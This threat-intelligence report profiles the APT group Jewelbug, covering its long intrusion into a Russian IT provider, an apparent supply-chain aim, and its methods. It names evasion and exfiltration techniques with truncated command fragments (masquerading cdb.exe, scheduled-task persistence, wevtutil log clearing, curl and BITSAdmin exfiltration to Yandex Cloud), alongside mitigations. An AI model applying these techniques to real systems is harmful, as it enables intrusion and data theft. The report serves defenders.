Full Report
Russian IT company among group’s latest targets. Attackers may have been attempting to target company’s customers in Russia with software supply chain attack.
Analysis Summary
# Threat Actor: Jewelbug
## Attribution & Identity
Chinese APT group.
**Known Aliases:** REF7707, CL-STA-0049, Earth Alux.
## Activity Summary
Jewelbug has been highly active recently, targeting organizations across South America, South Asia, Taiwan, and notably, Russia.
* **Russian IT Service Provider Intrusion (Jan - May 2025):** The group maintained access to a Russian IT service provider's network for five months, gaining access to source code repository and software build systems, suggesting an attempt to execute a supply chain attack against the provider's Russian customers.
* **South American Government Intrusion (Sep 2024 - Jul 2025):** Activity observed over several periods, including deploying a new, likely developmental backdoor in July 2025.
* Compromised networks of a Taiwanese company and an IT provider in South Asia.
* The targeting of a Russian entity marks a continuation of a recent trend, suggesting an adversarial stance following Russia’s invasion of Ukraine.
## Tactics, Techniques & Procedures
- **Binary Masquerading/Use of Benign Binaries:** Use of a renamed copy of `cdb.exe` (Microsoft Console Debugger) as `7zup.exe`. CDB is used to run shellcode, bypass application whitelisting, launch executables, and terminate security solutions.
- **Persistence:** Utilizing scheduled tasks (e.g., `schtasks /create /tn "GetEvent" ...`) for persistence and privilege escalation.
- **Credential Access:** Credential dumping observed.
- **Defense Evasion:** Clearing Windows Event Logs (`wevtutil cl ...`).
- **Lateral Movement:** Use of SMBExec tool.
- **C2/Exfiltration:** DLL sideloading leveraged. Use of BITSAdmin and `curl` tool for potential data exfiltration.
- **Supply Chain Compromise:** Targeting build systems and code repositories to infect downstream customers.
- **Tool Use:** Deployment of 7-zip archive manager for packing files prior to exfiltration.
- **Use of Legitimate Software:** Use of AnyDesk remote management software.
- **New Backdoor:** Deployment of a new backdoor leveraging Microsoft Graph API and OneDrive for Command and Control (C&C).
- [MITRE ATT&CK IDs not explicitly provided in the text.]
## Targeting
- **Sectors:** IT Service Providers, Government organizations.
- **Geography:** South America, South Asia, Taiwan, Russia.
- **Victims:** A Russian IT service provider, a large South American government organization, a Taiwanese company, and an IT provider in South Asia.
## Tools & Infrastructure
- **Malware Families Used:** New backdoor leveraging Microsoft Graph API/OneDrive (C&C).
- **Infrastructure:**
- Exfiltration destination: Yandex Cloud (chosen to avoid suspicion within Russia).
- C2: Microsoft Graph API and OneDrive (used by the new backdoor).
- **Specific Files/Commands:** `7zup.exe` (renamed `cdb.exe`), SMBExec, `yandex2.exe` (exfiltration sample).
## Implications
Jewelbug demonstrates capability in sophisticated infrastructure targeting, pivoting from traditional espionage to potentially disruptive supply chain operations aimed at Russian entities. Their use of Yandex Cloud suggests an adaptive tactic to blend into the Russian digital environment. The conflict dynamics between China and Russian actors suggest this targeting may persist or escalate.
## Mitigations
- Block the execution of benign Microsoft signed binaries like CDB (cdb.exe) unless explicitly required and whitelisted for specific users.
- Monitor for the creation of persistence mechanisms via scheduled tasks, especially those creating high-privilege entries.
- Scrutinize data exfiltration targeting cloud services popular within the local environment (e.g., Yandex Cloud in Russia).
- Implement controls to monitor/block DLL sideloading attempts.
- Harden build systems and code repositories against compromise to prevent supply chain attacks.